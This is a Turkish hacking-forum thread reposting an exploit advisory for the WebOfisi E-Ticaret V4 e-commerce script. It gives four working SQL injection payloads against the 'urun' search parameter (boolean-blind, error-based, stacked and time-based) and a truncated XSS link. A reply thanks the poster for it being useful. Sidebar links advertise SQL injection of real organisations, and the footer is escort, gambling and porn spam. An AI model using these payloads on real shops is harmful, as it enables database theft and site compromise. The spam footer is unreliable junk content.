Konu Bilgileri
Konu: WebOfisi E-Ticaret V4 - 'urun' SQL Injection Yazar: B0RU70
Okunma: 424 Yorum: 1
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
Exploit Title: WebOfisi E-Ticaret V4 - 'urun' SQL Injection
# Date: 2018-11-21
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.web-ofisi.com
# Software Demo: http://demobul.net/eticaretv4/
# Software Link: https://drive.google.com/file/d/1ZghFSsY...sp=sharing
# Version: v4.0
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: E-Ticaret v4 is a professional online shopping script with many features.
# Vulnerabilities have been discovered during penetration testing.

# PoC : SQLi :
# Request : /eticaretv4/arama.html?kategori=20&urun=test

# Parameter : urun (GET)
# Type : boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: 

kategori=20&urun=test") RLIKE (SELECT (CASE WHEN (6525=6525)THEN 0x74656474 ELSE 0x28 END)) AND ("YWLa"="YWLa

# Type: error-based
# Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: 

kategori=20&urun=test") OR (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT(ELT(6556=6556,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("ExaV"="ExaV

# Type: stacked queries
# Title: MySQL < 5.0.12 stacked queries (heavy query)
# Payload: 

kategori=20&urun=test");SELECT BENCHMARK(5000000,MD5(0x44527964)) AND ("KGaO"="KGaO

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 OR time-based blind
# Payload: 

kategori=20&urun=test") OR SLEEP(5) AND ("sDnb"="sDnb

# PoC : XSS :
# Payload :
http://demobul.net/eticaretv4/arama.html...%280%29%3E


---------------------------------------

Hide Post

Foruma Üye , hesabınız yoksa kayıt olmanız gerekmektedir

Cevapla
#2
teşekkürler elime vardı.

emeğine sağlık
Ara
Cevapla


WebOfisi E-Ticaret V4 - 'urun' SQL Injection Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  İran Nano Teknoloji Sql Injection TurKLoJeN 6 1,326 30.05.2021, Saat:05:29
Son Yorum: hayrom2253
  Virüssüz Havij 1.15 Pro - Advanced SQL Injection Final Kzsg 79 21,076 01.05.2021, Saat:01:37
Son Yorum: salvator
  CHP İZMİR MİLLETVEİKİLİ SQL İNJECTİON ACIK hankey 16 3,816 22.03.2021, Saat:21:38
Son Yorum: trwhite12
  Yunanistan SQL injection için google dorkları HeRoTurk 41 9,141 02.03.2021, Saat:22:17
Son Yorum: oxygen00
  NASA earthobservatory Blind SQL Injection TurKLoJeN 18 3,205 30.06.2020, Saat:12:56
Son Yorum: byrkoos


mersin escort gaziantep escort canlı bahis siteleri tipobet bahis siteleri kaçak iddaa canlı bahis mobilbahis deneme bonusu deneme bonusu bodrum escort kuşadası escort türkçe altyazılı porno hack forum escort izmit Extremely sexy foursome with a hot black babe Horny pornstar Heidi Mayne in hottest gangbang, facial porn scene antalya escort antalya escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort ataşehir escort anadolu yakası escort istanbul escort